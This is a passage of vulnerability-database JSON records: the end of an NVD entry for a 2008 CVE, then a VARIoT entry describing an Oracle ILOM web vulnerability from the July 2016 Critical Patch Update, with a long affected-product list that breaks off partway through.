exploitabilityScore: 3.9, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], }, published: "2008-10-14T21:11:10.833", references: [ { source: "cve@mitre.org", tags: [ "Vendor Advisory", ], url: "http://secunia.com/advisories/32291", }, { source: "cve@mitre.org", url: "http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html", }, { source: "cve@mitre.org", url: "http://www.securitytracker.com/id?1021054", }, { source: "cve@mitre.org", url: "http://www.vupen.com/english/advisories/2008/2825", }, { source: "cve@mitre.org", url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/45877", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "http://secunia.com/advisories/32291", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
"http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.securitytracker.com/id?1021054", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.vupen.com/english/advisories/2008/2825", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/45877", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-noinfo", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
var-201607-0587
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect integrity via vectors related to Web. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express, Oracle Database Server, Oracle Access Manager, Oracle BI Publisher, Oracle Business Intelligence Enterprise Edition, Oracle Directory Server Enterprise Edition, Oracle Exalogic Infrastructure, Oracle Fusion Middleware, Oracle GlassFish Server, Oracle HTTP Server, Oracle JDeveloper, Oracle Portal, Oracle WebCenter Sites, Oracle WebLogic Server, Outside In Technology, Hyperion Financial Reporting, Enterprise Manager Base Platform, Enterprise Manager for Fusion Middleware, Enterprise Manager Ops Center, Oracle E-Business Suite, Oracle Agile Engineering Data Management, Oracle Agile PLM, Oracle Demand Planning, Oracle Engineering Data Management, Oracle Transportation Management, PeopleSoft Enterprise FSCM, PeopleSoft Enterprise PeopleTools, JD Edwards EnterpriseOne Tools, Siebel Applications, Oracle Fusion Applications, Oracle Communications ASAP, Oracle Communications Core Session Manager, Oracle Communications EAGLE Application Processor, Oracle Communications Messaging Server, Oracle Communications Network Charging and Control, Oracle Communications Operations Monitor, Oracle Communications Policy Management, Oracle Communications Session Border Controller, Oracle Communications Unified Session Manager, Oracle Enterprise Communications Broker, Oracle Banking Platform, Oracle Financial Services Lending and Leasing, Oracle FLEXCUBE Direct Banking, Oracle Health Sciences Clinical Development Center, Oracle Health Sciences Information Manager, Oracle Healthcare Analytics Data Integration, Oracle Healthcare Master Person Index, Oracle Documaker, Oracle Insurance Calculation Engine, Oracle Insurance Policy Administration J2EE,
Oracle Insurance Rules Palette, MICROS Retail XBRi Loss Prevention, Oracle Retail Central, Oracle Back Office, Oracle Returns Management, Oracle Retail Integration Bus, Oracle Retail Order Broker, Oracle Retail Service Backbone, Oracle Retail Store Inventory Management, Oracle Utilities Framework, Oracle Utilities Network Management System, Oracle Utilities Work and Asset Management, Oracle In-Memory Policy Analytics, Oracle Policy Automation, Oracle Policy Automation Connector for Siebel, Oracle Policy Automation for Mobile Devices, Primavera Contract Management, Primavera P6 Enterprise Project Portfolio Management, Oracle Java SE, Oracle Java SE Embedded, Oracle JRockit, 40G 10G 72/64 Ethernet Switch, Fujitsu M10-1 Servers, Fujitsu M10-4 Servers, Fujitsu M10-4S Servers, ILOM, Oracle Switch ES1-24, Solaris, Solaris Cluster, SPARC Enterprise M3000 Servers, SPARC Enterprise M4000 Servers, SPARC Enterprise M5000 Servers, SPARC Enterprise M8000 Servers, SPARC Enterprise M9000 Servers, Sun Blade 6000 Ethernet Switched NEM 24P 10GE, Sun Data Center InfiniBand Switch 36, Sun Network 10GE Switch 72p, Sun Network QDR InfiniBand Gateway Switch, Oracle Secure Global Desktop, Oracle VM VirtualBox, MySQL Server. Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'HTTP' protocol. The 'Web' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. A remote attacker could exploit this vulnerability to update, insert, or delete data, affecting data integrity.
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0587", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", 
version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail 
store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail 
integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy 
automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, 
{ model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: 
"healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", 